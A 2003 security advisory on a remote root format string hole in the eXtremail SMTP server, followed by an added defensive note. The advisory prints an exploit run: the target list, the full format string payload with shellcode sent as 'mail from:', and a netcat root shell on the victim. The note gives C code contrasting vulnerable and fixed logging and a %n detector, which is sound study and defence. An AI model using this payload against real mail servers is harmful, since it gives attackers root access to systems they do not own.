-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote Vulnerabilities in eXtremail Server.
===========================================

Date:      02.07.2003
Email:     B-r00t
Reference: http://www.extremail.com/
Versions:  Linux eXtremail-1.5-8 => VULNERABLE
           Linux eXtremail-1.5-5 => VULNERABLE
Exploit:   eXtreme.c

eXtremail is a Unix mail server providing SMTP (port 25), POP3 (port 110)
and IMAP (port 143) services. Its latest versions are still affected by
format string vulnerabilities of the kind reported previously:

http://www.securityfocus.com/bid/2908/info/

eXtremail contains a format string vulnerability in its logging mechanism.
A user can send SMTP commands with maliciously constructed arguments that
trigger this vulnerability. eXtremail runs with root privileges, so by
exploiting it a remote attacker can gain superuser access on the underlying
host. It is also possible to crash eXtremail; if it is not restarted
automatically, a denial of SMTP service results.

These vulnerabilities were apparently fixed in version eXtremail 1.1.10,
but they have re-emerged in the latest versions.

Attached exploit [eXtreme.c] for the latest versions of eXtremail.

$ gcc -o eXtreme eXtreme.c
$ ./eXtreme
eXtreme by B-r00t . (c) 2003
Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2
0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3 eXtremail V1.5 DEBUG
On success a r00tshell will be spawned on port 36864.

$ ./eXtreme 192.168.0.50 2
eXtreme by B-r00t . (c) 2003
Connected to 192.168.0.50
Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send: HELO Br00t~R0x~Y3r~W0rld!
Recv: 250 Hi, I am localdomain
System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy: 0xbefff0c8
RET (shellcode): 0xbefff1d4
PAD (alignment): 1
Payload: 254 / 266 max bytes
Sending it ...
Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@ F@ /bin/shCf Vf VfC?)?A?AV v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386 GNU/Linux

- --
B#.
- ----------------------------------------------------
Email : B-r00t
Key fingerprint = 74F0 6A06 3E57 083A 4C9B ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39
HBOcgtG6P1BPhcxYzG/AoAM=
=GHV2
-----END PGP SIGNATURE-----
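Added note on the bug class in the advisory above (this is example code written for this page, not the advisory's exploit and not eXtremail's source): the defect is a client-supplied SMTP argument reaching the daemon's logger as the format string. The C below puts the vulnerable call pattern beside the fixed one, and adds a small check that counts printf directives in an untrusted string and flags %n, which is what the "mail from:" argument in the transcript looks like in a mail log or packet capture. The logger logmsg and the log_client_line_* functions are assumed names; the hostile sample is the printable prefix of the advisory's payload, the benign line is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logger in the style of a daemon's logmsg(fmt, ...).
 * Not eXtremail's code; the names in this file are assumptions. */
static int logmsg(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int written = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return written;
}

/* BUG PATTERN: the client line itself becomes the format string, so
 * %u/%x directives read the stack and %n writes to memory. The advisory's
 * payload relies on exactly this, using positional "%44$n" directives. */
static int log_client_line_vulnerable(char *out, size_t n, const char *client_line)
{
    return logmsg(out, n, client_line);
}

/* FIX: a constant format; the client line is only ever a %s argument,
 * so any '%' it contains is copied literally and never interpreted. */
static int log_client_line_fixed(char *out, size_t n, const char *client_line)
{
    return logmsg(out, n, "SMTP: %s", client_line);
}

/* Detection helper: count printf-style conversion directives in an
 * untrusted string and flag the write directive %n. A legitimate SMTP
 * envelope argument has no reason to contain any; several, with %n,
 * is the signature of a format string attack in logs or captures.
 * Length modifiers (l, h) are not parsed; they do not affect the count. */
static int count_format_directives(const char *s, int *has_write_directive)
{
    int count = 0;
    *has_write_directive = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        count++;
        /* skip flags, width, precision and positional "N$" up to the conversion char */
        const char *q = p + 1;
        while (*q && strchr("0123456789.$-+ #'", *q))
            q++;
        if (*q == 'n')
            *has_write_directive = 1;
        if (*q)
            p = q;                  /* resume after the conversion character */
    }
    return count;
}

/* Sample inputs: the printable prefix of the argument shown in the
 * advisory's transcript (before the raw shellcode bytes), and a
 * constructed benign envelope line for comparison. */
static const char SAMPLE_HOSTILE[] = "a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$n";
static const char SAMPLE_BENIGN[]  = "mail from: <alice@example.test>";

int main(void)
{
    char buf[128];
    int has_n;

    int hostile = count_format_directives(SAMPLE_HOSTILE, &has_n);
    printf("hostile: %d directives, %%n present: %d\n", hostile, has_n);
    int benign = count_format_directives(SAMPLE_BENIGN, &has_n);
    printf("benign:  %d directives, %%n present: %d\n", benign, has_n);

    /* The fixed logger copies the hostile argument literally. */
    log_client_line_fixed(buf, sizeof buf, SAMPLE_HOSTILE);
    printf("fixed logger output: %s\n", buf);

    /* The vulnerable logger is only ever called with benign input here;
     * passing the hostile sample to it would be undefined behaviour. */
    log_client_line_vulnerable(buf, sizeof buf, SAMPLE_BENIGN);
    printf("vulnerable logger, benign input: %s\n", buf);
    return 0;
}
```

Two practical points follow from the example. Compiled as written, gcc does not complain about log_client_line_vulnerable, because the variadic wrapper hides the non-literal format; declaring logmsg with `__attribute__((format(printf, 3, 4)))` makes `-Wformat-security` (or `-Werror=format-security`) report that call at compile time, which is the cheapest audit for this bug class in a daemon's own logging layer. And because the fixed logger stores the hostile argument verbatim, a mail log from a patched server still shows the "%.176u%44$n" pattern, so the directive count is a usable indicator for log review even after the crash or root shell is no longer possible.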